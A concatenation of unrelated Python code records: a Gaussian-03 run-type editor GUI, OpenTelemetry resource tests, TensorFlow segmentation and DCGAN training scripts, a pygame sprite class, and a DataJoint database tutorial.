+ Hyperpol.\",\n \"Numerical Polariz.\"]\n elif (EcceGlobals.Theory == \"ROHF\" or\n (EcceGlobals.Category == \"MP\" and\n (EcceGlobals.Theory == \"RMP3\" or\n EcceGlobals.Theory == \"UMP3\" or\n EcceGlobals.Theory == \"RMP4(SDQ)\" or\n EcceGlobals.Theory == \"UMP4(SDQ)\")) or\n EcceGlobals.Category == \"CI\" or\n (EcceGlobals.Category == \"CC\" and\n (EcceGlobals.Theory == \"RQCISD\" or\n EcceGlobals.Theory == \"UQCISD\" or\n EcceGlobals.Theory == \"RCCD\" or\n EcceGlobals.Theory == \"UCCD\"))):\n polarMethodChoice = [\"Numerical Polariz.\",\n \"Numerical Polariz. + Hyperpol.\"]\n else:\n polarMethodChoice = [\"Numerical Polariz.\"]\n self.polarMethod = EcceComboBox(self,\n choices = polarMethodChoice,\n name = \"ES.Runtype.Polar.Method\",\n default = 0,\n label = \"Method:\")\n polarSizer.AddWidget(self.polarMethod)\n \n self.efstepInput = EcceFloatInput(self,\n unit = \"AU\",\n name = \"ES.Runtype.Polar.EFieldStepSize\",\n default = 0.0019,\n hardRange = \"[0..)\",\n softRange = \"[1e-5..1e-2]\",\n label = \"Electric Field Step Size:\")\n polarSizer.AddWidget(self.efstepInput)\n\n self.panelSizer.Add(polarSizer)\n\n if (EcceGlobals.RunType == \"Vibration\" or\n EcceGlobals.RunType == \"GeoVib\"):\n vibSizer = EcceBoxSizer(self, \"IR/Raman\", 1)\n vibMethodEnable = True\n if (EcceGlobals.Theory == \"RHF\" or\n EcceGlobals.Theory == \"UHF\" or\n EcceGlobals.Category == \"DFT\" or\n EcceGlobals.Theory == \"RMP2\" or\n EcceGlobals.Theory == \"UMP2\" or\n EcceGlobals.Theory == \"CIS\"):\n vibMethodChoice = [\"Analytic\",\n \"Numerical 2nd Derivative\",\n \"Numerical 1st and 2nd Derivative\"]\n elif (EcceGlobals.Theory == \"ROHF\" or\n EcceGlobals.Theory == \"RMP3\" or\n EcceGlobals.Theory == \"UMP3\" or\n EcceGlobals.Theory == \"RMP4(SDQ)\" or\n EcceGlobals.Theory == \"UMP4(SDQ)\" or\n EcceGlobals.Theory == \"RMP4(DQ)\" or\n EcceGlobals.Theory == \"RMP4(DQ)\" or\n EcceGlobals.Theory == \"UMP4(DQ)\" or\n EcceGlobals.Theory == \"RQCISD\" or\n EcceGlobals.Theory == \"UQCISD\" or\n EcceGlobals.Theory == \"RCCD\" or\n EcceGlobals.Theory == \"UCCD\" or\n EcceGlobals.Theory == \"CISD\"):\n vibMethodChoice = [\"Numerical 2nd Derivative\",\n \"Numerical 1st and 2nd Derivative\"]\n elif (EcceGlobals.Theory == \"RMP4\" or\n EcceGlobals.Theory == \"UMP4\" or\n EcceGlobals.Theory == \"RQCISD(T)\" or\n EcceGlobals.Theory == \"UQCISD(T)\" or\n EcceGlobals.Theory == \"RCCSD\" or\n EcceGlobals.Theory == \"UCCSD\" or\n EcceGlobals.Theory == \"RCCSD(T)\" or\n EcceGlobals.Theory == \"UCCSD(T)\"):\n vibMethodChoice = [\"Numerical 1st and 2nd Derivative\"]\n elif (EcceGlobals.Category == \"SE\"):\n vibMethodChoice = [\"Analytic\",\n \"Numerical 2nd Derivative\"]\n else:\n vibMethodChoice = [\"Numerical 1st and 2nd Derivative\"]\n vibMethodEnable = False\n\n self.vibMethod = EcceComboBox(self,\n choices = vibMethodChoice,\n name = \"ES.Runtype.Vibration.Method\",\n default = 0,\n label = \"Method:\")\n self.vibMethod.Enable(vibMethodEnable)\n vibSizer.AddWidget(self.vibMethod)\n\n self.fdStep = EcceFloatInput(self,\n unit = \"Angstrom\",\n name = \"ES.Runtype.Vibration.FiniteStepSize\",\n default = 0.001,\n hardRange = \"(0..)\",\n softRange = \"(0..0.1]\",\n label = \"FD Step Size:\")\n vibSizer.AddWidget(self.fdStep)\n\n self.panelSizer.Add(vibSizer)\n if EcceGlobals.RunType == \"Magnetic\":\n magneticSizer = EcceBoxSizer(self,\n label = \"Magnetic/NMR\",\n cols = 1)\n\n magneticMethodChoice = [\"Gauge-Independent Atomic Orbitals\",\n \"Continuous Set of Gauge Transformations\",\n \"Atoms-In-Molecules Gauge\",\n 
\"Single Origin\"]\n self.magneticMethod = EcceComboBox(self,\n choices = magneticMethodChoice,\n name = \"ES.Runtype.Magnetic.Method\",\n default = 0,\n label = \"Method:\")\n magneticSizer.AddWidget(self.magneticMethod)\n\n self.panelSizer.Add(magneticSizer)\n\n self.AddButtons()\n\n def CheckDependency(self):\n if (EcceGlobals.RunType == \"Geometry\" or\n EcceGlobals.RunType == \"GeoVib\"):\n self.stepSpin.Enable(self.stepCheckBox.GetValue())\n if (len(self.hessianChoice) == 2 and\n self.find.GetSelection() == 1):\n self.hessian.SetSelection(1)\n if EcceGlobals.RunType == \"Polarizability\":\n self.efstepInput.Enable(self.polarMethod.GetValue() !=\n \"Analytic Polariz. + Hyperpol.\")\n if (EcceGlobals.RunType == \"Vibration\" or\n EcceGlobals.RunType == \"GeoVib\"):\n self.fdStep.Enable(self.vibMethod.GetValue() != \"Analytic\")\n\n\nframe = Ged03RunTypeFrame(None,\n title = \"ECCE Gaussian-03 Editor: Runtype Details\",\n app = app,\n helpURL = \"\")\n","sub_path":"scripts/codereg/ged03runtype.py","file_name":"ged03runtype.py","file_ext":"py","file_size_in_byte":13512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"435981821","text":"# Copyright The OpenTelemetry Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# pylint: disable=protected-access\n\nimport unittest\n\nfrom opentelemetry.sdk import resources\n\n\nclass TestResources(unittest.TestCase):\n def test_create(self):\n labels = {\n \"service\": \"ui\",\n \"version\": 1,\n \"has_bugs\": True,\n \"cost\": 112.12,\n }\n\n resource = resources.Resource.create(labels)\n self.assertIsInstance(resource, resources.Resource)\n self.assertEqual(resource.labels, labels)\n\n resource = resources.Resource.create_empty()\n self.assertIs(resource, resources._EMPTY_RESOURCE)\n\n resource = resources.Resource.create(None)\n self.assertIs(resource, resources._EMPTY_RESOURCE)\n\n resource = resources.Resource.create({})\n self.assertIs(resource, resources._EMPTY_RESOURCE)\n\n def test_resource_merge(self):\n left = resources.Resource({\"service\": \"ui\"})\n right = resources.Resource({\"host\": \"service-host\"})\n self.assertEqual(\n left.merge(right),\n resources.Resource({\"service\": \"ui\", \"host\": \"service-host\"}),\n )\n\n def test_resource_merge_empty_string(self):\n \"\"\"Verify Resource.merge behavior with the empty string.\n\n Labels from the source Resource take precedence, with\n the exception of the empty string.\n\n \"\"\"\n left = resources.Resource({\"service\": \"ui\", \"host\": \"\"})\n right = resources.Resource(\n {\"host\": \"service-host\", \"service\": \"not-ui\"}\n )\n self.assertEqual(\n left.merge(right),\n resources.Resource({\"service\": \"ui\", \"host\": \"service-host\"}),\n )\n\n def test_immutability(self):\n labels = {\n \"service\": \"ui\",\n \"version\": 1,\n \"has_bugs\": True,\n \"cost\": 112.12,\n }\n\n labels_copy = labels.copy()\n\n resource = resources.Resource.create(labels)\n self.assertEqual(resource.labels, labels_copy)\n\n 
resource.labels[\"has_bugs\"] = False\n self.assertEqual(resource.labels, labels_copy)\n\n labels[\"cost\"] = 999.91\n self.assertEqual(resource.labels, labels_copy)\n","sub_path":"opentelemetry-sdk/tests/resources/test_resources.py","file_name":"test_resources.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"523870817","text":"import os\nimport sys\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nimport glob\nimport random\nimport pdb\nimport time\n\n# basic parameters\nlayers = 8\nstride = 1\npool = 2\nlearning_rate = 1.0e-4\nepochs = 1000000\ntrain_batch_size = 5\nimg_hsize = 128 \nimg_wsize = 128\nnum_channels = 3\nnum_classes = 2\ntrain_rate = 0.999\n\n# construct networks\n# layers\nfeatures1 = num_channels\nx = tf.placeholder(tf.float32,[None,img_hsize,img_wsize,features1])\n\nfeatures2 = 32\n\nfeatures3 = 64\n\nfeatures4 = 128\n\nfeatures5 = 256\n\nfeatures6 = 512\n\nfeatures_fc1 = 800\n\nfeatures_fc2 = num_classes\ny_ = tf.placeholder(tf.int32,[None,img_hsize,img_wsize,1])\n\n# linkers\ndef weight_init(shape):\t#weight initialization function, wight number ~ nodes\n\tinit_value = tf.truncated_normal(shape,stddev=0.05)\n\treturn tf.Variable(init_value)\ndef bias_init(shape):\t#bias initialization function, bias number ~ latter features\n\tinit_value = tf.constant(0.05,shape=shape)\n\treturn tf.Variable(init_value)\n\nfilter1 = 5\nW_conv1 = weight_init([filter1,filter1,features1,features2])\nb_conv1 = bias_init([features2])\n\nfilter2 = 5\nW_conv2 = weight_init([filter2,filter2,features2,features3])\nb_conv2 = bias_init([features3])\n\nfilter3 = 5\nW_conv3 = weight_init([filter3,filter3,features3,features4])\nb_conv3 = bias_init([features4])\n\nfilter4 = 5\nW_conv4 = weight_init([filter4,filter4,features4,features5])\nb_conv4 = bias_init([features5])\n\nfilter5 = 5\nW_conv5 = weight_init([filter5,filter5,features5,features6])\nb_conv5 = bias_init([features6])\n\nW_fc1 = weight_init([img_hsize//pow(pool,(layers-3))*img_wsize//pow(pool,(layers-3))*features6,features_fc1])\nb_fc1 = bias_init([features_fc1])\n\nW_fc2 = weight_init([features_fc1, features_fc2])\nb_fc2 = bias_init([features_fc2])\n\n# operation\ndef conv2d(x,W,stride):\n\treturn tf.nn.conv2d(x,W,strides=[1,stride,stride,1],padding='SAME')\ndef max_pool_2x2(x,pool):\n\treturn tf.nn.max_pool(x,ksize=[1,pool,pool,1],strides=[1,pool*stride,pool*stride,1],padding='SAME')\n\nh_conv1 = tf.nn.relu(conv2d(x,W_conv1,stride)+b_conv1)\nh_pool1 = max_pool_2x2(h_conv1,pool)\n\nh_conv2 = tf.nn.relu(conv2d(h_pool1,W_conv2,stride)+b_conv2)\nh_pool2 = max_pool_2x2(h_conv2,pool)\n\nh_conv3 = tf.nn.relu(conv2d(h_pool2,W_conv3,stride)+b_conv3)\nh_pool3 = max_pool_2x2(h_conv3,pool)\n\nh_conv4 = tf.nn.relu(conv2d(h_pool3,W_conv4,stride)+b_conv4)\nh_pool4 = max_pool_2x2(h_conv4,pool)\n\nh_conv5 = tf.nn.relu(conv2d(h_pool4,W_conv5,stride)+b_conv5)\nh_pool5 = max_pool_2x2(h_conv5,pool)\n\nh_pool5_flat = tf.reshape(h_pool5,[-1,img_hsize//pow(pool,(layers-3))*img_wsize//pow(pool,(layers-3))*features6])\nh_fc1 = tf.nn.relu(tf.matmul(h_pool5_flat,W_fc1)+b_fc1)\nkeep_prob = tf.placeholder(tf.float32)\nh_fc1_drop = tf.nn.dropout(h_fc1,keep_prob)\n\ny_conv = tf.nn.softmax(tf.matmul(h_fc1_drop,W_fc2)+b_fc2)\n\n# get weight data\nsaver = tf.train.Saver()\nwith tf.Session() as sess1:\n\tsaver.restore(sess1, tf.train.latest_checkpoint('RECG_model3/'))\n\tW1_data = sess1.run(W_conv1)\n\tb1_data = sess1.run(b_conv1)\n\tW2_data = 
sess1.run(W_conv2)\n\tb2_data = sess1.run(b_conv2)\n\tW3_data = sess1.run(W_conv3)\n\tb3_data = sess1.run(b_conv3)\nhconv1_data = tf.nn.relu(conv2d(x,W1_data,stride)+b1_data)\nhpool1_data = max_pool_2x2(hconv1_data,pool)\nhconv2_data = tf.nn.relu(conv2d(hpool1_data,W2_data,stride)+b2_data)\nhpool2_data = max_pool_2x2(hconv2_data,pool)\nhconv3_data = tf.nn.relu(conv2d(hpool2_data,W3_data,stride)+b3_data)\nhpool3_data = max_pool_2x2(hconv3_data,pool)\n\n# pool5 to t_pool3 layer\nW_t3 = weight_init([filter5,filter5,features4,features6])\nb_t3 = bias_init([features4])\nconv_t3 = tf.nn.conv2d_transpose(h_pool5,W_t3,tf.shape(h_pool3),strides=[1,4,4,1],padding='SAME')+b_t3\nfuse_3 = tf.add(conv_t3,hpool3_data)\n\n# pool3 to t_pool1 layer\nW_t1 = weight_init([filter3,filter3,features2,features4])\nb_t1 = bias_init([features2])\nconv_t1 = tf.nn.conv2d_transpose(fuse_3,W_t1,tf.shape(h_pool1),strides=[1,4,4,1],padding='SAME')+b_t1\nfuse_1 = tf.add(conv_t1,hpool1_data)\n\n# pool1 to t_original image layer\nW_t0 = weight_init([filter1,filter1,num_classes,features2])\nb_t0 = bias_init([num_classes])\nx_shape = tf.shape(x)\ndeconv_shape = tf.stack([x_shape[0],x_shape[1],x_shape[2],num_classes])\nconv_t0 = tf.nn.conv2d_transpose(fuse_1,W_t0,deconv_shape,strides=[1,2,2,1],padding='SAME')+b_t0\nannotation_pred = tf.expand_dims(tf.argmax(conv_t0,axis=3), dim=3)\n\nloss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=conv_t0,\n\tlabels=tf.squeeze(y_,squeeze_dims=[3])))\n\ntrainable_var = tf.trainable_variables()\noptimizer = tf.train.AdamOptimizer(learning_rate)\ngrads= optimizer.compute_gradients(loss,trainable_var)\ntrain_op = optimizer.apply_gradients(grads)\n\n# load data\ntrain_images = glob.glob('cutout_train_data/images/*')\ntrain_annotations = glob.glob('cutout_train_data/annotations/*')\nvalid_images = glob.glob('cutout_valid_data/images/*')\nvalid_annotations = glob.glob('cutout_valid_data/annotations/*')\n# prepare for minibatch\ndef next_batch(img_names,ann_names,batch_size):\n\t# indexs = [random.randint(0,len(img_names)-1) for _ in range(batch_size)]\n\tindexs = random.sample(range(0,len(img_names)-1),batch_size)\n\timages = []\n\tannots = []\n\tfor index in indexs:\n\t\timage = cv2.imread(img_names[index],flags=1)\n\t\tannot = cv2.imread(ann_names[index],flags=0)\n\t\timage = cv2.resize(image,(img_wsize,img_hsize),0,0,cv2.INTER_AREA)\n\t\timage = image.astype(np.float32)\n\t\timage = np.multiply(image,1.0/255.0)\n\t\timages.append(image)\n\t\tannot = cv2.resize(annot,(img_wsize,img_hsize),0,0,cv2.INTER_AREA)\n\t\tannot = annot.reshape((img_hsize,img_wsize,1))\n\t\tannot = annot.astype(np.float32)\n\t\tannot = np.multiply(annot,1.0/255.0)\n\t\tannots.append(annot)\n\timages = np.array(images)\n\tannots = np.array(annots)\n\treturn images, annots\n\n# training\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\nwith tf.Session() as sess:\n\tif sys.argv[1] == 'train':\n\t\tsess.run(init)\n\t\tfor i in range(epochs):\n\t\t\ttrain_batch = next_batch(train_images,train_annotations,train_batch_size)\n\t\t\tfeed_dict = {x:train_batch[0],y_:train_batch[1],keep_prob:1.0}\n\t\t\tsess.run(train_op,feed_dict=feed_dict)\n\t\t\tif (i+1)%50 == 0:\n\t\t\t\ttrain_loss = sess.run(loss,feed_dict=feed_dict)\n\t\t\t\tprint('step %d, train loss: %g'%(i+1,train_loss))\n\t\t\t\tsaver.save(sess,'CUTOUT_model/cutout.cpk',global_step=i+1)\n\t\t\t# save the predication of the last epoch\n\t\t\tif (i+1) == epochs:\n\t\t\t\tpred = 
sess.run(annotation_pred,feed_dict={x:train_batch[0],keep_prob:1.0})\n\t\t\t\tpred = np.squeeze(pred,axis=3)\n\t\t\t\tfor j in range(train_batch_size):\n\t\t\t\t\timg_save = pred[j]*255\n\t\t\t\t\tcv2.imwrite(os.path.join('CUTOUT_model/img/',str(j)+'.jpg'),img_save)\n\telif sys.argv[1] == 'predict':\n\t\t# testing image\n\t\ttest0 = cv2.imread(\"test/test.jpg\",flags=1)\n\n\t\tfor k in range(1):\n\t\t\t# resize to (128,128)\n\t\t\ttest = cv2.resize(test0,(img_wsize,img_hsize),0,0,cv2.INTER_AREA)\n\t\t\ttest = test.astype(np.float32)\n\t\t\ttest = np.multiply(test,1.0/255.0)\n\t\t\t# convert to the shape for tensorflow placeholder\n\t\t\ttest = test.reshape((1,test.shape[0],test.shape[1],test.shape[2]))\n\t\t\t# predicting\n\t\t\tsaver.restore(sess,tf.train.latest_checkpoint('CUTOUT_model/'))\n\t\t\tpred = sess.run(annotation_pred,feed_dict={x:test,keep_prob:1.0})\n\t\t\t# recover the shape for displaying image\n\t\t\ttest = np.squeeze(test,axis=0) * 255\n\t\t\tpred = np.squeeze(pred,axis=0) * 255\n\t\t\tpred = pred.astype(np.float32)\n\t\t\t# recover predication to the original size\n\t\t\tpred = cv2.resize(pred,(test0.shape[1],test0.shape[0]),0,0,cv2.INTER_CUBIC)\n\t\t\tpred = pred.reshape((pred.shape[0],pred.shape[1],1))\n\n\t\t\t# extract the ROI and save, test0 is the result\n\t\t\tfor i in range(pred.shape[0]):\n\t\t\t\tfor j in range(pred.shape[1]):\n\t\t\t\t\tif pred[i,j] == 0:\n\t\t\t\t\t\ttest0[i,j] = (255,255,255)\n\t\t\tcv2.imwrite(\"test/annot\"+str(k)+\".jpg\",test0)\n\t# elif sys.argv[1] == 'predict2':\n\t# \t# source image\n\t# \ttest = cv2.imread(\"test/test.jpg\",flags=1)\n\t# \ttest = cv2.resize(test,(img_wsize,img_hsize),0,0,cv2.INTER_LINEAR)\n\t# \ttest = test.astype(np.float32)\n\t# \ttest = np.multiply(test,1.0/255.0)\n\t# \ttest = test.reshape((1,test.shape[0],test.shape[1],test.shape[2]))\n\n\t# \t# label\n\t# \ttest_annot = cv2.imread(\"test/test_annot.jpg\",flags=0)\n\t# \ttest_annot = cv2.resize(test_annot,(img_wsize,img_hsize),0,0,cv2.INTER_LINEAR)\n\t# \ttest_annot = test_annot.reshape((img_wsize,img_hsize,1))\n\t# \ttest_annot = test_annot.astype(np.float32)\n\t# \ttest_annot = np.multiply(test_annot,1.0/255.0)\n\t# \ttest_annot = test_annot.reshape((1,test_annot.shape[0],test_annot.shape[1],test_annot.shape[2]))\n\n\t# \tsaver.restore(sess,tf.train.latest_checkpoint('CUTOUT_model/'))\n\t# \tpred = sess.run(annotation_pred,feed_dict={x:test,keep_prob:1.0})\n\n\t# \tpredict_loss2 = sess.run(loss,feed_dict={x:test,y_:pred,keep_prob:1.0})\n\t# \tpredict_loss = sess.run(loss,feed_dict={x:test,y_:test_annot,keep_prob:1.0})\n\t# \tprint(predict_loss)\n\t# \tprint(predict_loss2)\n\n\t# \tpred = np.squeeze(pred,axis=0)\n\t# \tpred = pred * 255\n\t# \ttest = np.squeeze(test,axis=0) * 255\n\n\t# \tresult = pred*test/255\n\t# \tfor i in range(img_hsize):\n\t# \t\tfor j in range(img_wsize):\n\t# \t\t\tif all(result[i,j]) == 0:\n\t# \t\t\t\tresult[i,j] = (255,255,255)\n\n\t# \tcv2.imwrite(\"test/image.jpg\",test)\n\t# \tcv2.imwrite(\"test/annot.jpg\",result)","sub_path":"CUTOUT_FCN.py","file_name":"CUTOUT_FCN.py","file_ext":"py","file_size_in_byte":9107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"258470093","text":"import os\nimport random\nimport numpy as np\nimport pylab as plt\n\nimport sys\nimport csgan as cs\n\n\n\nfile_list = ['../../dataset/map1n_allz_rtaapixlw_2048_'+str(i)+'.fits' for i in range(1,4)]\ndp = cs.Data_Provider(file_list,preprocess_mode=2)\n\n#dt = 
filt_all(dp(10,128),func)\n#dt.shape\n#fig,(ax1,ax2)=plt.subplots(1,2,figsize=(8,18))\n#ax1.imshow(dt[0,:,:,0])\n#ax2.imshow(dt[0,:,:,1])\n\n\nbatch_size = 64\nimage_size = 256\ncheckpoint_dir = './checkpoint/'+sys.argv[0][:-3]\nsample_dir = './samples/'+sys.argv[0][:-3]\n\ndef dpp(n):\n# return dp(n,image_size).reshape(n,image_size,image_size,1)\n return filt_all(dp(n,image_size),func)\n\n# defult_model_build lets you to define your own generator and discriminator. \n# Set it to 1, if you want to use default DCGAN architecture.\nimport tensorflow as tf\n\ndef discriminator(image, reuse=False):\n with tf.variable_scope(\"discriminator\") as scope:\n if reuse:\n scope.reuse_variables()\n\n trainable = 1\n\n h0 = tf.layers.conv2d(inputs=image, filters=dcgan.df_dim, kernel_size=[5,5], \n strides=(2,2),padding='same',\n activation=tf.nn.relu, name='d_h0_conv')\n\n h1 = tf.layers.conv2d(inputs=h0, filters=2*dcgan.df_dim, kernel_size=[5,5], \n strides=(2,2),padding='same',\n activation=None, name='d_h1_conv')\n h1 = tf.contrib.layers.batch_norm(h1,decay=0.9,updates_collections=None,\n epsilon=1e-5,scale=True,is_training=trainable,scope='d_bn1')\n h1 = tf.nn.relu(h1)\n\n h2 = tf.layers.conv2d(inputs=h1, filters=4*dcgan.df_dim, kernel_size=[5,5], \n strides=(2,2),padding='same',\n activation=None, name='d_h2_conv')\n h2 = tf.contrib.layers.batch_norm(h2,decay=0.9,updates_collections=None,\n epsilon=1e-5,scale=True,is_training=trainable,scope='d_bn2')\n h2 = tf.nn.relu(h2)\n\n h3 = tf.layers.conv2d(inputs=h2, filters=8*dcgan.df_dim, kernel_size=[5,5], \n strides=(2,2),padding='same',\n activation=None, name='d_h3_conv')\n h3 = tf.contrib.layers.batch_norm(h3,decay=0.9,updates_collections=None,\n epsilon=1e-5,scale=True,is_training=trainable,scope='d_bn3')\n h3 = tf.nn.relu(h3)\n \n h4 = tf.layers.conv2d(inputs=h3, filters=8*dcgan.df_dim, kernel_size=[5,5], \n strides=(2,2),padding='same',\n activation=None, name='d_h4_conv')\n h4 = tf.contrib.layers.batch_norm(h4,decay=0.9,updates_collections=None,\n epsilon=1e-5,scale=True,is_training=trainable,scope='d_bn4')\n h4 = tf.nn.relu(h4)\n\n h5 = tf.layers.dense(inputs=tf.reshape(h4, [dcgan.batch_size, -1]),\n units=1,kernel_initializer=tf.random_normal_initializer(stddev=0.02), \n bias_initializer=tf.constant_initializer (0.01),\n use_bias=1,activation=None,name='d_h5_lin')\n\n return tf.nn.sigmoid(h5), h5\n\ndef generator(z, batch_size, mode='train'):\n with tf.variable_scope(\"generator\") as scope:\n if mode=='train':\n trainable = True\n pass\n elif mode=='sampler':\n trainable = False\n scope.reuse_variables()\n else:\n assert 0,'Unkown mode for generator.'\n\n s_h, s_w = dcgan.output_height, dcgan.output_width\n s_h2, s_w2 = cs.conv_out_size_same(s_h, 2), cs.conv_out_size_same(s_w, 2)\n s_h4, s_w4 = cs.conv_out_size_same(s_h2, 2), cs.conv_out_size_same(s_w2, 2)\n s_h8, s_w8 = cs.conv_out_size_same(s_h4, 2), cs.conv_out_size_same(s_w4, 2)\n s_h16, s_w16 = cs.conv_out_size_same(s_h8, 2), cs.conv_out_size_same(s_w8, 2)\n\n # assert s_h16*s_w16*self.gf_dim*8==z.shape[1],str(s_h16*s_w16*self.gf_dim*8)+' != '+str(z.shape[1])\n\n # project `z` and reshape\n dcgan.z_ = tf.layers.dense(z,dcgan.gf_dim * 8 * s_h16 * s_w16,\n kernel_initializer=tf.random_normal_initializer(stddev=0.02), \n bias_initializer=tf.constant_initializer (0.01),\n use_bias=1,activation=None,name='g_h0_lin')\n with tf.variable_scope('g_h0_lin', reuse=True):\n dcgan.h0_w = tf.get_variable('kernel')\n dcgan.h0_b = tf.get_variable('bias')\n dcgan.h0 = tf.reshape(dcgan.z_, [batch_size, 
s_h16, s_w16, dcgan.gf_dim * 8])\n        h0 = tf.contrib.layers.batch_norm(dcgan.h0,decay=0.9,updates_collections=None,\n            epsilon=1e-5,scale=True,is_training=trainable,scope='g_bn0')\n        h0 = tf.nn.relu(h0)\n\n        dcgan.h1, dcgan.h1_w, dcgan.h1_b = cs.deconv2d(h0, [batch_size, s_h8, s_w8, dcgan.gf_dim * 4],\n            name='g_h1', with_w=True)\n        h1 = tf.contrib.layers.batch_norm(dcgan.h1,decay=0.9,updates_collections=None,\n            epsilon=1e-5,scale=True,is_training=trainable,scope='g_bn1')\n        h1 = tf.nn.relu(h1)\n\n        h2, dcgan.h2_w, dcgan.h2_b = cs.deconv2d(h1, [batch_size, s_h4, s_w4, dcgan.gf_dim * 2],\n            name='g_h2', with_w=True)\n        h2 = tf.contrib.layers.batch_norm(h2,decay=0.9,updates_collections=None,\n            epsilon=1e-5,scale=True,is_training=trainable,scope='g_bn2')\n        h2 = tf.nn.relu(h2)\n\n        h3, dcgan.h3_w, dcgan.h3_b = cs.deconv2d(h2, [batch_size, s_h2, s_w2, dcgan.gf_dim * 1],\n            name='g_h3', with_w=True)\n        h3 = tf.contrib.layers.batch_norm(h3,decay=0.9,updates_collections=None,\n            epsilon=1e-5,scale=True,is_training=trainable,scope='g_bn3')\n        h3 = tf.nn.relu(h3)\n\n        h4, dcgan.h4_w, dcgan.h4_b = cs.deconv2d(h3, [batch_size, s_h, s_w, 4*dcgan.c_dim],\n            name='g_h4', with_w=True)\n\n        h5 = tf.layers.conv2d(inputs=h4, filters=2*dcgan.c_dim, kernel_size=[5,5],\n            strides=(1,1),padding='same',\n            activation=None, name='g_h5')\n        h5 = tf.contrib.layers.batch_norm(h5,decay=0.9,updates_collections=None,\n            epsilon=1e-5,scale=True,is_training=trainable,scope='d_bn5')\n        h5 = tf.nn.relu(h5)\n\n        h6 = tf.layers.conv2d(inputs=h5, filters=dcgan.c_dim, kernel_size=[5,5],\n            strides=(1,1),padding='same',\n            activation=None, name='d_h6_conv')\n        h6 = tf.contrib.layers.batch_norm(h6,decay=0.9,updates_collections=None,\n            epsilon=1e-5,scale=True,is_training=trainable,scope='d_bn6')\n\n        return tf.nn.tanh(h6)\n\n# The DCGAN object must exist before the custom networks can be attached to\n# it, so it is created first. The original script passed the undefined name\n# defult_model_build; per the comment above, 0 is assumed here to request the\n# custom (non-default) architecture, and build_model() is called once the\n# custom networks are in place.\ndcgan = cs.DCGAN(\n    data_provider = dp,\n    batch_size=64, gf_dim=64, df_dim=64,\n    label_real_lower=.9, label_fake_upper=.1,\n    z_dim=2048,checkpoint_dir=checkpoint_dir,\n    save_per = 100, defult_model_build=0)\n\ndcgan.discriminator = discriminator\ndcgan.generator = generator\ndcgan.build_model()\n\ndcgan.train(num_epoch=100000,batch_per_epoch=50,verbose=10,\\\nlearning_rate=1e-4,D_update_per_batch=1,G_update_per_batch=1,\\\nsample_dir=sample_dir,checkpoint_dir=checkpoint_dir,time_limit=600)\n","sub_path":"scripts/hist/SDCGAN.py","file_name":"SDCGAN.py","file_ext":"py","file_size_in_byte":7280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"642634597","text":"#! /usr/bin/env python\nimport pygame\n\n# Sprite class for the mountain terrain\nclass Montana(pygame.sprite.Sprite):\n\tdef __init__(self,posx,posy):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.imagenMontana = pygame.image.load('img/montana.jpg')\n\t\tself.rect = self.imagenMontana.get_rect()\n\t\tself.visible = False\n\t\tself.rect.top = posy\n\t\tself.rect.left = posx\n\t\tself.costo = (99,99)\n\n\tdef dibujar(self,superficie):\n\t\tsuperficie.blit(self.imagenMontana, self.rect)","sub_path":"Practica3/Mundo/Clases/Montana.py","file_name":"Montana.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"482087830","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # An example of a data pipeline written in datajoint\n\n# Datajoint is a tool to describe relational databases in Python or MATLAB. It allows scientists, who are often not very experienced with databases, to communicate with a SQL database. 
Some more info can be found here:\n# \n# https://tutorials.datajoint.io/\n# \n# https://docs.datajoint.io/python/\n\n# In[1]:\n\n\nimport datajoint as dj\nimport pylab as pl\nimport numpy as np\nfrom scipy import stats\n\n\n# After installing a local SQL server [like MariaDB] you should be able to connect to it.\n\n# In[2]:\n\n\ndj.conn()\n\n\n# ## 1) Defining the relational structure of the database\n\n# Define the schema to work in\n\n# In[3]:\n\n\nschema = dj.schema('manuel_test')\n\n\n# And the relational structure of the database. This database contains users that run experiments. Every experiment contains a data set with datapoints; these datapoints are analyzed and the result saved back in the database.\n# \n# There are four allowed types of tables: Lookup, Manual, Imported and Part. The construction of the database is done by the definitions in the definition string. Lookup and Manual allow to specify all relevant components. Imported and computed run a function to populate the database automatically\n\n# In[4]:\n\n\n@schema\nclass User(dj.Lookup):\n definition = \"\"\"\n # users in the lab\n username : varchar(20) # user in the lab\n ---\n first_name : varchar(20) # user first name\n last_name : varchar(20) # user last name\n \"\"\"\n contents = [\n ['Angus', 'Angus', 'Macguyver'],\n ['John', 'John', 'Doe'],\n ]\n\n@schema\nclass Experiment(dj.Manual):\n definition = \"\"\" # A simple experiment.\n -> User\n experiment : int # allowed here are sql datatypes.\n ----\n \"\"\"\n \n@schema\nclass Set(dj.Imported):\n definition = \"\"\"\n # A set of datapoints\n -> Experiment\n -----\n \"\"\"\n\n class DataPoint(dj.Part):\n definition = \"\"\"\n # Collected data.\n -> Set\n datapoint : int\n -----\n x : float\n y : float\n \"\"\"\n\n def _make_tuples(self, key):\n # Note that Imported and Computed (below) have a function _make_tuples\n # This allows to call a method s.populate() to automatically populate the data with content.\n n = 10\n mu = 0\n sigma = .1\n self.insert1(key)\n # Insert all of our datapoints\n b = []\n for i in range(n):\n b.append(dict(key, datapoint=i, x=i + np.random.normal(mu, sigma), y=2*i + np.random.normal(mu, sigma)))\n self.DataPoint().insert(b)\n\n\n# Datajoint allows to plot an entity relationship diagram. This shows explicitly what we have just described:\n\n# 